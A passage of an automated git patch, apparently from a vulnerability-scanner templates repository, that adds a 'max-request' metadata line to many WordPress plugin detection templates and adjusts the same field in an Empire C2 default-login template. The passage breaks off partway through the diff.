+templates-checksum.txt:ba21f9d07ed57b21a54259b1e007c24d2dd41e97
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 77b12e260db51b8385be3f1e742bb670ba3a4cc2 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:46:27 +0000
Subject: [PATCH 0418/1090] TemplateMan Update [Mon Sep 18 09:46:27 UTC 2023]
 :robot:

---
 http/default-logins/empire/empirec2-default-login.yaml          | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 +
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 +
 http/technologies/wordpress/plugins/amp.yaml                    | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 +
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 +
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 +
 http/technologies/wordpress/plugins/elementor.yaml              | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 +
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 +
 http/technologies/wordpress/plugins/formidable.yaml             | 1 +
 http/technologies/wordpress/plugins/forminator.yaml             | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 +
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 +
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 +
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 +
 http/technologies/wordpress/plugins/health-check.yaml           | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 +
 http/technologies/wordpress/plugins/loginpress.yaml             | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 +
 http/technologies/wordpress/plugins/members.yaml                | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 +
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 +
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 +
 http/technologies/wordpress/plugins/polylang.yaml               | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 +
 http/technologies/wordpress/plugins/redirection.yaml            | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 +
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 +
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 +
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 +
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 +
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 +
 http/technologies/wordpress/plugins/worker.yaml                 | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 +
 201 files changed, 201 insertions(+), 1 deletion(-)

diff --git a/http/default-logins/empire/empirec2-default-login.yaml b/http/default-logins/empire/empirec2-default-login.yaml
index c7949479a9..95e829e685 100644
--- a/http/default-logins/empire/empirec2-default-login.yaml
+++ b/http/default-logins/empire/empirec2-default-login.yaml
@@ -10,7 +10,7 @@ info:
     - https://github.com/BC-SECURITY/Empire
     - https://github.com/BC-SECURITY/empire-docs/blob/main/restful-api/README.md
   metadata:
-    max-request: 1
+    max-request: 2
     verified: true
   tags: default-login,empire,c2
 
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
